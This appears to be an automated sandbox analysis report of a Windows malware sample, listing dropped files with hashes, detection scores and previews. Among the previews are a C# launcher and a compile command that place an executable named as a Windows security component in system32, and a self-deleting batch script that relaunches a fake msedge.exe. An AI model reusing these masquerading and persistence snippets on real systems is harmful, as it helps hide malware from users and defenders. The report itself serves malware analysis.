                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                                            Entropy (8bit):4.163856189774724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ayfFwyPzLkn:aMzzLkn
                                                                                                                                                                                                            MD5:E229D7358FE4BA809FFEE2AB11789E41
                                                                                                                                                                                                            SHA1:75B143B840FA8EEC16C02A9CA75A76C62A163C54
                                                                                                                                                                                                            SHA-256:BCA084445B73867E09375DC28686E54F3BE63E844BFD3E847FCB1C524996B0F0
                                                                                                                                                                                                            SHA-512:6D4827B9333DDEAE607D4705185A2189BF357F4ABDB02AEB1ABE7BC3BD979553E5B7AED26788B50DDF4B9084D9C6B3714C5DF172047FAB9033E8334D235996FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:40BKWzDHtoeUBWjVTDnjfJHfC
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                                            Entropy (8bit):4.243856189774724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:JDl3w3:JDl3w3
                                                                                                                                                                                                            MD5:56990D7EE02F08064B4CC5527FAAF1D4
                                                                                                                                                                                                            SHA1:4409497DFEA164492E7CD9AAE2AB2C1ECA14FAB1
                                                                                                                                                                                                            SHA-256:D891B5C64EE41706E99A257485E6A60F9B806C30F7F0B4E5EF567A8231278893
                                                                                                                                                                                                            SHA-512:9FEF655C0A06637E32B39EF75B3D81DF7EA69C4D9DDE035CCEAC85DFFBAFFFCF46004DD7D162C75029F66C666840BF6005CF45ACDDC5BCA3A5B062A3B4D0142B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:jZyQvfBy1Ht4Dee52ADfIIUV8
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):388
                                                                                                                                                                                                            Entropy (8bit):4.95086143983048
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLAZc/EiFkD:JNVQIbSfhV7TiFkMSfhscFkD
                                                                                                                                                                                                            MD5:BC679215E0084B6A1E8582E54ACFBD63
                                                                                                                                                                                                            SHA1:C3C1446F2B18964BE4AAFD6156D01BDB4610BC48
                                                                                                                                                                                                            SHA-256:4482F553AF53DAC42F3D191F4ED1B9347512B70BE8A8D17F429AD74BDD61C6F8
                                                                                                                                                                                                            SHA-512:0ECF8237327C1CF697BB99FDA5799CCF777D75D83198B70FDB8C458250B48886E0A2F4B21293E6562DEC370C9F2DFD5C403F84C189F281E2790661CD60619A8E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Idle.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):254
                                                                                                                                                                                                            Entropy (8bit):5.090817987287188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fhX45qLhx:Hu7L//TRq79cQlZJX9b
                                                                                                                                                                                                            MD5:AE9C7EBA69736E4AA21AA63629D461A9
                                                                                                                                                                                                            SHA1:273909E7AE0CE32620E28B86588F365990ADD49C
                                                                                                                                                                                                            SHA-256:362B1FA40F80D0E1B5E148CCB1103B066734C43E05A26164025C32D666AA1D8C
                                                                                                                                                                                                            SHA-512:CFDC866696B5DFD9E5CA2A18056BF5FC21F81FE8F03B4AA20C53DE36310B43A69221A04AD562DDFF7E723E89A725D0D7E170C3E1F72147C700B72BABAE72ADDB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.0.cs"
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (318), with CRLF, CR line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):739
                                                                                                                                                                                                            Entropy (8bit):5.26099918429941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:apI/u7L//TRq79cQlZJX9aKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDOKax5DqBVKVrdFAMBJj
                                                                                                                                                                                                            MD5:4360C9430F4169B421263DE8636C8096
                                                                                                                                                                                                            SHA1:E7C9CCD19A93C231EE80E9D8AD9FE736C36A25F6
                                                                                                                                                                                                            SHA-256:DE5BEEA5AF7B922D22D1EF36847CAFB24FA70244B8E68144B3EC2E443BC4A110
                                                                                                                                                                                                            SHA-512:6F271F2E057B34E9B45F45DA7C1172970D07F03FAF9400010C580B2517AD0E8EDC8A1D0167D44D09335800A81E27F087513854FFB9BFCDAF093FB8E93BD3717E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.061918651686551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE74vKOZG1cNwi23f3zS9h:HTg9uYDE3ZfzSr
                                                                                                                                                                                                            MD5:BDB242E60B6B3B5DB690E27EFC55FC70
                                                                                                                                                                                                            SHA1:87AD1B2B52C073BDF1EBEA42A86D2C2070D77927
                                                                                                                                                                                                            SHA-256:9942BD80526668D3F1AB5163E0E197DAE2A5F8E297B5EB9E71C9E20ACA634A7B
                                                                                                                                                                                                            SHA-512:BA946F12A1331DFCBAD9C5B1A4438F84151E6A5667A37495A94249265DAD18FCC0CAFDADEA8FC66EDDF793D43E8970E15589C4F80867F7154BFBDEAB6F388AF8
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ndC0udATSD.bat"
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                                            Entropy (8bit):4.243856189774724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:grjHjIXjn:uAz
                                                                                                                                                                                                            MD5:3B87817DB6EC1255F9C3483C6F996F28
                                                                                                                                                                                                            SHA1:953F4CB60182B2096F8C0EFA2DB1BACE6CCC6E2F
                                                                                                                                                                                                            SHA-256:EB17FF714F4BC4DE9F42EB918A7300660223352637955B9D8CD9053943929A83
                                                                                                                                                                                                            SHA-512:5206BF40EF09FACC8F5265354B44E28DEBA16AA2F372DF60D9CECB8FF95921CCDB8E1E5AE36F051BD00F6FA6EE327E328802E293219F9B1F3430DFB0C0783EFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:cT2N0HfzJFSchAtUdjdk80kz3
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):5.645950918301459
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                            MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                            SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                            SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                            SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
